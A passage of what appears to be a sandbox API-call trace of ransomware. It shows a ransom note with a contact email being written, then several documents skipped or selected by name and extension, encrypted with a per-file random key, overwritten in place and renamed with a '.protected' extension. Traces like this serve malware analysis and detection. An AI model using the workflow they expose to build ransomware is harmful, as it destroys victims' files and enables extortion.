lstrlenA (lpString="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") returned 684 [0091.524] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.525] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.525] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0091.525] CloseHandle (hObject=0xb4) returned 1 [0091.525] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.525] lstrcmpiW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="Windows") returned -1 [0091.525] lstrcmpiW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="Program Files") returned -1 [0091.525] lstrcmpiW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="Program Files (x86)") returned -1 [0091.526] lstrcmpiW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="$Recycle.bin") returned 1 [0091.526] lstrcmpiW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="System Volume Information") returned -1 [0091.526] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx") returned 66 [0091.526] StrStrIW (lpFirst="Owxukk3Ya-fHVmLDY.docx", lpSrch=".protected") returned 0x0 [0091.526] lstrcmpW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.526] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.526] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\owxukk3ya-fhvmldy.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx") returned 66 [0091.526] StrStrW (lpFirst="Owxukk3Ya-fHVmLDY.docx", lpSrch=".txt") returned 0x0 [0091.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx") returned 66 [0091.526] StrStrW (lpFirst="Owxukk3Ya-fHVmLDY.docx", lpSrch=".rar") returned 0x0 [0091.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx") returned 66 [0091.527] StrStrW (lpFirst="Owxukk3Ya-fHVmLDY.docx", lpSrch=".zip") returned 0x0 [0091.527] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.527] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.527] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.528] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.528] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.528] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.528] CloseHandle (hObject=0xb4) returned 1 [0091.528] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx.protected") returned 76 [0091.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\documents\\owxukk3ya-fhvmldy.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\owxukk3ya-fhvmldy.docx.protected")) returned 1 [0091.532] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.532] lstrcmpiW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="Windows") returned -1 [0091.532] lstrcmpiW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="Program Files") returned -1 [0091.532] lstrcmpiW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="Program Files (x86)") returned -1 [0091.532] lstrcmpiW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="$Recycle.bin") returned 1 [0091.532] lstrcmpiW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="System Volume Information") returned -1 [0091.532] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx") returned 65 [0091.532] StrStrIW (lpFirst="PKgBfBp5qjgkCtrf.pptx", lpSrch=".protected") returned 0x0 [0091.532] lstrcmpW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.532] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.535] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pkgbfbp5qjgkctrf.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx") returned 65 [0091.535] StrStrW (lpFirst="PKgBfBp5qjgkCtrf.pptx", lpSrch=".txt") returned 0x0 [0091.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx") returned 65 [0091.535] StrStrW (lpFirst="PKgBfBp5qjgkCtrf.pptx", lpSrch=".rar") returned 0x0 [0091.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx") returned 65 [0091.535] StrStrW (lpFirst="PKgBfBp5qjgkCtrf.pptx", lpSrch=".zip") returned 0x0 [0091.535] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.536] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.536] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.536] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.536] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.536] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.536] CloseHandle (hObject=0xb4) returned 1 [0091.537] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx.protected") returned 75 [0091.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pkgbfbp5qjgkctrf.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pkgbfbp5qjgkctrf.pptx.protected")) returned 1 [0091.590] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.590] lstrcmpiW (lpString1="puNsgA3G.docx", lpString2="Windows") returned -1 [0091.590] lstrcmpiW (lpString1="puNsgA3G.docx", lpString2="Program Files") returned 1 [0091.590] lstrcmpiW (lpString1="puNsgA3G.docx", lpString2="Program Files (x86)") returned 1 [0091.590] lstrcmpiW (lpString1="puNsgA3G.docx", lpString2="$Recycle.bin") returned 1 [0091.590] lstrcmpiW (lpString1="puNsgA3G.docx", lpString2="System Volume Information") returned -1 [0091.590] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx") returned 57 [0091.590] StrStrIW (lpFirst="puNsgA3G.docx", lpSrch=".protected") returned 0x0 [0091.590] lstrcmpW (lpString1="puNsgA3G.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.590] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.590] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\punsga3g.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xb4 [0091.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx") returned 57 [0091.591] StrStrW (lpFirst="puNsgA3G.docx", lpSrch=".txt") returned 0x0 [0091.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx") returned 57 [0091.591] StrStrW (lpFirst="puNsgA3G.docx", lpSrch=".rar") returned 0x0 [0091.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx") returned 57 [0091.591] StrStrW (lpFirst="puNsgA3G.docx", lpSrch=".zip") returned 0x0 [0091.591] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.592] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.592] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.592] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.592] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.592] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.592] CloseHandle (hObject=0xb4) returned 1 [0091.592] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\puNsgA3G.docx.protected") returned 67 [0091.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\punsga3g.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\punsga3g.docx.protected")) returned 1 [0091.597] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.597] lstrcmpiW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="Windows") returned -1 [0091.597] lstrcmpiW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="Program Files") returned 1 [0091.597] lstrcmpiW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="Program Files (x86)") returned 1 [0091.597] lstrcmpiW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="$Recycle.bin") returned 1 [0091.597] lstrcmpiW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="System Volume Information") returned -1 [0091.597] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx") returned 63 [0091.597] StrStrIW (lpFirst="PVLpLKRdu1m f1.xlsx", lpSrch=".protected") returned 0x0 [0091.597] lstrcmpW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.598] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.598] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pvlplkrdu1m f1.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx") returned 63 [0091.598] StrStrW (lpFirst="PVLpLKRdu1m f1.xlsx", lpSrch=".txt") returned 0x0 [0091.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx") returned 63 [0091.598] StrStrW (lpFirst="PVLpLKRdu1m f1.xlsx", lpSrch=".rar") returned 0x0 [0091.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx") returned 63 [0091.598] StrStrW (lpFirst="PVLpLKRdu1m f1.xlsx", lpSrch=".zip") returned 0x0 [0091.598] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.599] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.599] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.599] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.600] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.600] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.600] CloseHandle (hObject=0xb4) returned 1 [0091.600] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx.protected") returned 73 [0091.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pvlplkrdu1m f1.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pvlplkrdu1m f1.xlsx.protected")) returned 1 [0091.601] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.601] lstrcmpiW (lpString1="QbonyhsO.rtf", lpString2="Windows") returned -1 [0091.601] lstrcmpiW (lpString1="QbonyhsO.rtf", lpString2="Program Files") returned 1 [0091.601] lstrcmpiW (lpString1="QbonyhsO.rtf", lpString2="Program Files (x86)") returned 1 [0091.601] lstrcmpiW (lpString1="QbonyhsO.rtf", lpString2="$Recycle.bin") returned 1 [0091.601] lstrcmpiW (lpString1="QbonyhsO.rtf", lpString2="System Volume Information") returned -1 [0091.601] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf") returned 56 [0091.601] StrStrIW (lpFirst="QbonyhsO.rtf", lpSrch=".protected") returned 0x0 [0091.601] lstrcmpW (lpString1="QbonyhsO.rtf", lpString2="RESTORE_FILES.txt") returned -1 [0091.601] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.601] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbonyhso.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf") returned 56 [0091.602] StrStrW (lpFirst="QbonyhsO.rtf", lpSrch=".txt") returned 0x0 [0091.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf") returned 56 [0091.602] StrStrW (lpFirst="QbonyhsO.rtf", lpSrch=".rar") returned 0x0 [0091.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf") returned 56 [0091.602] StrStrW (lpFirst="QbonyhsO.rtf", lpSrch=".zip") returned 0x0 [0091.602] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.603] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.603] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.603] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.603] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.603] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.603] CloseHandle (hObject=0xb4) returned 1 [0091.603] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf.protected") returned 66 [0091.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbonyhso.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbonyhso.rtf.protected")) returned 1 [0091.605] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.605] lstrcmpiW (lpString1="qoqSsP_XOts8.xlsx", lpString2="Windows") returned -1 [0091.606] lstrcmpiW (lpString1="qoqSsP_XOts8.xlsx", lpString2="Program Files") returned 1 [0091.606] lstrcmpiW (lpString1="qoqSsP_XOts8.xlsx", lpString2="Program Files (x86)") returned 1 [0091.606] lstrcmpiW (lpString1="qoqSsP_XOts8.xlsx", lpString2="$Recycle.bin") returned 1 [0091.606] lstrcmpiW (lpString1="qoqSsP_XOts8.xlsx", lpString2="System Volume Information") returned -1 [0091.606] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx") returned 61 [0091.606] StrStrIW (lpFirst="qoqSsP_XOts8.xlsx", lpSrch=".protected") returned 0x0 [0091.606] lstrcmpW (lpString1="qoqSsP_XOts8.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.606] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.606] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qoqssp_xots8.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx") returned 61 [0091.606] StrStrW (lpFirst="qoqSsP_XOts8.xlsx", lpSrch=".txt") returned 0x0 [0091.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx") returned 61 [0091.606] StrStrW (lpFirst="qoqSsP_XOts8.xlsx", lpSrch=".rar") returned 0x0 [0091.607] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx") returned 61 [0091.607] StrStrW (lpFirst="qoqSsP_XOts8.xlsx", lpSrch=".zip") returned 0x0 [0091.607] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.607] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.607] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 